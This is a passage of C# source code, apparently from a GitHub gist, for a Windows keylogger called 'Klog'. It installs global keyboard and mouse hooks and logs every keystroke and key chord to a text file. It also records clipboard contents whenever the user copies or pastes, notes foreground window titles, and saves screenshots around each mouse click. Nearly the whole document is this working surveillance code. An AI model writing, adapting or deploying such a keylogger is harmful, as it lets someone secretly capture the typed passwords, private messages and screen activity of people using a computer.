inBuffer, | |
MyKeyboardHookStruct.flags) == 1) | |
{ | |
char key = (char)inBuffer[0]; | |
if ((isDownCapslock ^ isDownShift) && Char.IsLetter(key)) key = Char.ToUpper(key); | |
KeyPressEventArgs e = new KeyPressEventArgs(key); | |
KeyPress(this, e); | |
handled = handled || e.Handled; | |
} | |
/* | |
// below does not work | |
char[] inBuffer = new char[4]; | |
if (ToUnicode(MyKeyboardHookStruct.vkCode, | |
MyKeyboardHookStruct.scanCode, | |
keyState, | |
inBuffer, inBuffer.Length, | |
MyKeyboardHookStruct.flags) == 1) | |
{ | |
char key = inBuffer[0]; | |
//if ((isDownCapslock ^ isDownShift) && Char.IsLetter(key)) key = Char.ToUpper(key); | |
KeyPressEventArgs e = new KeyPressEventArgs(key); | |
KeyPress(this, e); | |
handled = handled || e.Handled; | |
} | |
*/ | |
} | |
// raise KeyUp | |
if (KeyUp != null && (wParam == WM_KEYUP || wParam == WM_SYSKEYUP)) | |
{ | |
Keys keyData = (Keys)MyKeyboardHookStruct.vkCode; | |
KeyEventArgs e = new KeyEventArgs(keyData); | |
KeyUp(this, e); | |
handled = handled || e.Handled; | |
} | |
} | |
//if event handled in application do not handoff to other listeners | |
if (handled) | |
return 1; | |
else | |
return CallNextHookEx(hKeyboardHook, nCode, wParam, lParam); | |
} | |
} | |
} | |
namespace Klog | |
{ | |
/// <summary> | |
/// We want to log things like: | |
/// [Ctrl] // by itself | |
/// [Ctrl+A+V] // all simultaneous | |
/// [Ctrl+Alt+Del] // all simultaneous | |
/// [Alt+F,C] // Alt held, then F, C pressed in succession | |
/// | |
/// Bug: | |
/// - we don't distinguish between "Alt+E+V" (same time) and "Alt+E,V" (consecutive) | |
/// </summary> | |
public class KeyChord | |
{ | |
bool _completed = false; | |
bool _ctrlDown = false; | |
bool _altDown = false; | |
bool _shiftDown = false; | |
bool _winDown = false; | |
Keys _lastKeyDown; | |
List<Keys> _normalKeys = new List<Keys>(); | |
String _stringRep = String.Empty; | |
public KeyChord() { } | |
/// <summary> | |
/// Reopen a completed chord | |
/// </summary> | |
public void Reopen() | |
{ | |
_completed = false; | |
_lastKeyDown = Keys.None; | |
_normalKeys.Clear(); | |
_stringRep = String.Empty; | |
} | |
// Chord is "Started" if any modifiers were pressed | |
public bool HasControlKeys { get { return _ctrlDown || _altDown || _winDown; } } | |
public bool Completed { get { return _completed; } } | |
public event EventHandler ClipboardAction; | |
public void AddKeyDown(Keys k) | |
{ | |
if (_completed) { throw new InvalidOperationException("Chord completed."); } | |
switch (k) | |
{ | |
case Keys.RControlKey: | |
case Keys.LControlKey: | |
_ctrlDown = true; break; | |
case Keys.LMenu: | |
case Keys.RMenu: | |
_altDown = true; break; | |
case Keys.RShiftKey: | |
case Keys.LShiftKey: | |
_shiftDown = true; break; | |
case Keys.RWin: | |
case Keys.LWin: | |
_winDown = true; break; | |
default: | |
// Add the key | |
if (HasControlKeys && _lastKeyDown != k) | |
{ | |
_normalKeys.Add(k); | |
} | |
break; | |
} | |
_lastKeyDown = k; | |
} | |
public void AddKeyUp(Keys k) | |
{ | |
if (_completed) { throw new InvalidOperationException("Chord completed."); } | |
switch (k) | |
{ | |
case Keys.RControlKey: | |
case Keys.LControlKey: | |
CompleteChord(); | |
_ctrlDown = false; break; | |
case Keys.LMenu: | |
case Keys.RMenu: | |
CompleteChord(); | |
_altDown = false; break; | |
case Keys.RShiftKey: | |
case Keys.LShiftKey: | |
CompleteChord(); | |
_shiftDown = false; break; | |
case Keys.RWin: | |
case Keys.LWin: | |
CompleteChord(); | |
_winDown = false; break; | |
default: | |
if (!HasControlKeys && !IsNormalKey(k)) | |
{ | |
// TODO: special case for characters | |
_normalKeys.Add(k); | |
CompleteChord(); | |
} | |
break; | |
} | |
_lastKeyDown = Keys.None; | |
} | |
static bool IsNormalKey(Keys key) | |
{ | |
int k = (int)key; | |
return | |
(k >= (int)Keys.D0 && k <= (int)Keys.Z) || | |
(k >= (int)Keys.NumPad0 && k <= (int)Keys.Divide) || | |
(k >= (int)Keys.Oem1 && k <= (int)Keys.OemBackslash) || // for some laptop keyboards | |
key == Keys.Space; | |
} | |
void CompleteChord() | |
{ | |
_completed = true; | |
if (_normalKeys.Count > 0) | |
{ | |
StringBuilder sb = new StringBuilder(); | |
sb.Append("["); | |
if (_ctrlDown) { sb.Append("Ctrl+"); } | |
if (_altDown) { sb.Append("Alt+"); } | |
if (_winDown) { sb.Append("Win+"); } | |
if (_shiftDown) { sb.Append("Shift+"); } | |
foreach (Keys k in _normalKeys) | |
{ | |
sb.Append(k.ToString()); | |
} | |
sb.Append("]"); | |
_stringRep = sb.ToString(); | |
// Cliboard actions | |
// Note: modifiers are OK (sometimes Ctrl+Alt+V, Ctrl+Shift+V etc are paste special | |
// and similar) | |
if (_ctrlDown && | |
_normalKeys.Contains(Keys.V) || | |
_normalKeys.Contains(Keys.C) || | |
_normalKeys.Contains(Keys.X)) | |
{ | |
if (ClipboardAction != null) { ClipboardAction(this, EventArgs.Empty); } | |
} | |
} | |
} | |
public override string ToString() | |
{ | |
if (Completed) { return _stringRep; } | |
return base.ToString(); | |
} | |
} | |
public class SimpleKeylogger | |
{ | |
public static readonly String LogPath = | |
Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments), @"Klog-Logs"); | |
public static readonly String LogFileName = | |
Path.Combine(LogPath, "Activity.txt"); | |
// Helpers | |
ForegroundWindow _window = new ForegroundWindow(); | |
KeyChord _keyChord = new KeyChord(); | |
int _nextBitmapNum = 0; | |
public SimpleKeylogger() | |
{ | |
_keyChord.ClipboardAction += new EventHandler(OnClipboardAction); | |
} | |
void OnClipboardAction(object sender, EventArgs e) | |
{ | |
String cb = Clipboard.GetText(); | |
if (!String.IsNullOrEmpty(cb)) | |
{ | |
LogEvent(Environment.NewLine + "[Clipboard: " + cb + "]" + Environment.NewLine); | |
} | |
} | |
public void OnKeyDown(object sender, KeyEventArgs e) | |
{ | |
_keyChord.AddKeyDown(e.KeyData); | |
} | |
public void OnKeyUp(object sender, KeyEventArgs e) | |
{ | |
_keyChord.AddKeyUp(e.KeyData); | |
if (_keyChord.Completed) | |
{ | |
String s = _keyChord.ToString(); | |
if (!String.IsNullOrEmpty(s)) { s += Environment.NewLine; } | |
_keyChord.Reopen(); | |
LogEvent(s); | |
} | |
} | |
void LogEvent(String s) | |
{ | |
if (String.IsNullOrEmpty(s)) { return; } | |
if (_window.CheckHasChanged()) | |
{ | |
String date = DateTime.Now.ToString("yyyy-MM-dd HH:mm:ss"); | |
String app = Environment.NewLine + "--- " + date + " App: " + _window.Text + Environment.NewLine; | |
File.AppendAllText(LogFileName, app); | |
} | |
File.AppendAllText(LogFileName, s); | |
} | |
public void OnKeyPress(object sender, KeyPressEventArgs e) | |
{ | |
if (Char.GetUnicodeCategory(e.KeyChar) != UnicodeCategory.Control) | |
{ | |
LogEvent(e.KeyChar.ToString()); | |
} | |
} | |
public void OnMouseActivity(object sender, MouseEventArgs e) | |
{ | |
if (e.Clicks == 0) | |
{ | |
String filename = GetNextBitmapFilename(); | |
CaptureClickBitmap(e.Location, filename); | |
LogEvent("[Click #" + (_nextBitmapNum - 1) + "]"); | |
} | |
} | |
String GetNextBitmapFilename() | |
{ | |
while (true) | |
{ | |
String filename = Path.Combine(LogPath, "Click" + _nextBitmapNum.ToString("00000") + ".png"); | |
++_nextBitmapNum; | |
if (!File.Exists(filename)) { return filename; } | |
} | |
} | |
[UIPermission(SecurityAction.Assert)] | |
void CaptureClickBitmap(Point clickLocation, String filename) | |
{ | |
int Off = 4; | |
int r = 100; | |
Rectangle bounds = new Rectangle(clickLocation.X - r, clickLocation.Y - r, r * 2, r * 2); | |
using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) | |
{ | |
using (Graphics g = Graphics.FromImage(bitmap)) | |
{ | |
g.CopyFromScreen(bounds.Location, Point.Empty, bounds.Size); | |
g.DrawEllipse(Pens.Yellow, r - Off, r - Off, Off * 2, Off * 2); | |
--Off; | |
g.DrawEllipse(Pens.Red, r - Off, r - Off, Off * 2, Off * 2); | |
//g.DrawLine(Pens.Red, r - Off, r - Off, r + Off, r + Off); | |
//g.DrawLine(Pens.Red, r - Off, r + Off, r + Off, r - Off); | |
} | |
bitmap.Save(filename, ImageFormat.Png); | |
} | |
} | |
} | |
public partial class OptionsForm : Form | |
{ | |
UserActivityHook _hook; | |
public OptionsForm() | |
{ | |
Directory.CreateDirectory(Path.GetDirectoryName(SimpleKeylogger.LogFileName)); | |
InitializeKeylogger(); | |
StartHooks(); | |
} | |
#region Hooks | |
void InitializeKeylogger() | |
{ | |
SimpleKeylogger logger = new SimpleKeylogger(); | |
_hook = new UserActivityHook(false, false); | |
_hook.KeyPress += logger.OnKeyPress; | |
_hook.KeyUp += logger.OnKeyUp; | |
_hook.KeyDown += logger.OnKeyDown; | |
_hook.OnMouseActivity += logger.OnMouseActivity; | |
} | |
void StartHooks() | |
{ | |
_hook.Start(true,true); // (MouseClicks, Keylog) | |
} | |
void StopHooks() | |
{ | |
if (_hook != null) { _hook.Stop(true, true, false); } | |
} | |
#endregion | |
} | |
public class ForegroundWindow | |
{ | |
String _text; | |
public String Text { get { return _text; } } | |
public bool CheckHasChanged() | |
{ | |
String oldText = _text; | |
UpdateText(); | |
return oldText != _text; | |
} | |
void UpdateText() | |
{ | |
const int nChars = 512; | |
IntPtr handle = GetForegroundWindow(); | |
StringBuilder buffer = new StringBuilder(nChars); | |
if (GetWindowText(handle, buffer, nChars) > 0) | |
{ | |
_text = buffer.ToString(); | |
} | |
else | |
{ | |
_text = "unknown"; | |
} | |
_text = _text + " (" + handle + ")"; | |
} | |
[DllImport("user32.dll")] | |
static extern IntPtr GetForegroundWindow(); | |
[DllImport("user32.dll")] | |
static extern int GetWindowText(IntPtr hWnd, StringBuilder text, int count); | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment